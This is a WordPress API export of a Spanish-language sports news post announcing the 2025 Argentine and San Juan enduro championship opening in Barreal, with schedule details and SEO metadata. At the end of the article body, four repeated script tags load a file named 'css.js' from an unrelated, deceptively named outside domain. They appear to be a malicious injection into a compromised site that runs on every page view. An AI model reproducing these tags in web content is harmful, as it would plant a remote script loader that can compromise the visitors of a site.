{"id":22504,"date":"2025-03-27T15:12:04","date_gmt":"2025-03-27T18:12:04","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=22504"},"modified":"2026-02-02T19:13:52","modified_gmt":"2026-02-02T22:13:52","slug":"barreal-sera-el-punto-de-encuentro-del-enduro","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/","title":{"rendered":"Barreal, ser\u00e1 el punto de encuentro del enduro"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Se viene el inicio de los campeonatos argentino y sanjuanino de enduro y la localidad de Barreal fue la elegida para la apertura de la temporada 2025.&nbsp;<strong>Ambos campeonatos contar\u00e1n con fechas dobles y en la modalidad FIM<\/strong>. Se espera una nutrida concurrencia de enduristas de todo el pa\u00eds, quienes comenzar\u00e1n este jueves 27 con el cronograma de actividades, mientras que las competencias se disputar\u00e1n entre s\u00e1bado y domingo.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Con la organizaci\u00f3n de&nbsp;<strong>ASER, Asociaci\u00f3n Sanjuanina de Enduro y Rescate<\/strong>, ente local que regula los destinos del motociclismo en nuestra provincia y la fiscalizaci\u00f3n de&nbsp;<strong>CoNaE, Comisi\u00f3n Nacional de Enduro y CAMoD, Confederaci\u00f3n Argentina de Motociclismo Deportivo<\/strong>, y el auspicio del&nbsp;<strong>Ministerio de Turismo Cultura y Deporte<\/strong>. Barreal ya comenz\u00f3 a recepcionar a los visitantes que potenciar\u00e1n tur\u00edsticamente el departamento Calingasta, donde se reunir\u00e1n los mejores enduristas nacionales en un marco de belleza inigualable, enmarcado por la Cordillera de los Andes.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ambos campeonatos contemplan un formato de competencia de dos fechas.&nbsp;<strong>El s\u00e1bado 29 de marzo se disputar\u00e1 la 1\u00aa fecha, mientras que el domingo 30, se correr\u00e1 la 2\u00aa fecha<\/strong>. La&nbsp;<strong>modalidad de competencia es por sistema FIM<\/strong>, ello quiere decir, que los competidores, para completar una vuelta de carrera, deben recorrido dos especiales cronometrados, como as\u00ed tambi\u00e9n, los tramos de enlace entre ellos. De acuerdo a la categor\u00eda, ser\u00e1 la cantidad de vueltas dispuestas por la organizaci\u00f3n. Por ello, por ejemplo, las categor\u00edas competitivas recorrer\u00e1n m\u00e1s vueltas que las promocionales.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Este jueves los competidores ingresan con sus equipos al&nbsp;<strong>paddock ubicado en el Centro Cultural Barreal<\/strong>. En ese mismo lugar se recepcionan las inscripciones, mientras que posteriormente los enduristas podr\u00e1n recorrer los dos especiales, pero caminando, no pudiendo utilizar medios mec\u00e1nicos para hacerlo. Cabe destacar que el<strong>&nbsp;Especial 1 se denomina \u201cAnfiteatro\u201d<\/strong>, siendo un Cross Test, mientras que el&nbsp;<strong>Especial 2 se denomina \u201cPlanchada Sur\u201d<\/strong>&nbsp;y es un Enduro Test.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El viernes 28 de marzo se habilita el \u00e1rea de entrenamiento de 15:00 a 16:00 horas, mientras que los pilotos deber\u00e1n concurrir a reuni\u00f3n a las 19:00 para posteriormente participar en forma obligatoria de la rampa simb\u00f3lica, desde las 20:30 en la plaza departamental.&nbsp;<strong>Ambas competencias se largar\u00e1n a las 9:00 hora<\/strong>s, mientras que el domingo 30 a las 16:00 comenzar\u00e1n las entregas de premios.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Se viene el inicio de los campeonatos argentino y sanjuanino de enduro y la localidad de Barreal fue la elegida para la apertura de la temporada 2025.&nbsp;Ambos campeonatos contar\u00e1n con fechas dobles y en la modalidad FIM. Se espera una nutrida concurrencia de enduristas de todo el pa\u00eds, quienes comenzar\u00e1n este jueves 27 con el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5692,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[178],"tags":[],"class_list":["post-22504","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Barreal, ser\u00e1 el punto de encuentro del enduro - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Barreal, ser\u00e1 el punto de encuentro del enduro - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Se viene el inicio de los campeonatos argentino y sanjuanino de enduro y la localidad de Barreal fue la elegida para la apertura de la temporada 2025.&nbsp;Ambos campeonatos contar\u00e1n con fechas dobles y en la modalidad FIM. Se espera una nutrida concurrencia de enduristas de todo el pa\u00eds, quienes comenzar\u00e1n este jueves 27 con el [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-03-27T18:12:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T22:13:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2019\/06\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"782\" \/>\n\t<meta property=\"og:image:height\" content=\"439\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Barreal, ser\u00e1 el punto de encuentro del enduro\",\"datePublished\":\"2025-03-27T18:12:04+00:00\",\"dateModified\":\"2026-02-02T22:13:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/\"},\"wordCount\":407,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2019\\\/06\\\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg\",\"articleSection\":[\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/\",\"name\":\"Barreal, ser\u00e1 el punto de encuentro del enduro - San Juan Deportes\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2019\\\/06\\\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg\",\"datePublished\":\"2025-03-27T18:12:04+00:00\",\"dateModified\":\"2026-02-02T22:13:52+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2019\\\/06\\\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2019\\\/06\\\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg\",\"width\":782,\"height\":439},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/03\\\/27\\\/barreal-sera-el-punto-de-encuentro-del-enduro\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Barreal, ser\u00e1 el punto de encuentro del enduro\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Barreal, ser\u00e1 el punto de encuentro del enduro - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/","og_locale":"es_ES","og_type":"article","og_title":"Barreal, ser\u00e1 el punto de encuentro del enduro - San Juan Deportes","og_description":"Se viene el inicio de los campeonatos argentino y sanjuanino de enduro y la localidad de Barreal fue la elegida para la apertura de la temporada 2025.&nbsp;Ambos campeonatos contar\u00e1n con fechas dobles y en la modalidad FIM. Se espera una nutrida concurrencia de enduristas de todo el pa\u00eds, quienes comenzar\u00e1n este jueves 27 con el [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-03-27T18:12:04+00:00","article_modified_time":"2026-02-02T22:13:52+00:00","og_image":[{"width":782,"height":439,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2019\/06\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/"},"author":{"name":"admin","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Barreal, ser\u00e1 el punto de encuentro del enduro","datePublished":"2025-03-27T18:12:04+00:00","dateModified":"2026-02-02T22:13:52+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/"},"wordCount":407,"commentCount":0,"publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2019\/06\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg","articleSection":["San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/","name":"Barreal, ser\u00e1 el punto de encuentro del enduro - San Juan Deportes","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2019\/06\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg","datePublished":"2025-03-27T18:12:04+00:00","dateModified":"2026-02-02T22:13:52+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2019\/06\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2019\/06\/4fb8587df126df1d8b1e29c4416f1b29_L.jpg","width":782,"height":439},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/03\/27\/barreal-sera-el-punto-de-encuentro-del-enduro\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Barreal, ser\u00e1 el punto de encuentro del enduro"}]},{"@type":"WebSite","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website","url":"http:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"http:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=22504"}],"version-history":[{"count":5,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22504\/revisions"}],"predecessor-version":[{"id":29022,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/22504\/revisions\/29022"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/5692"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=22504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=22504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=22504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}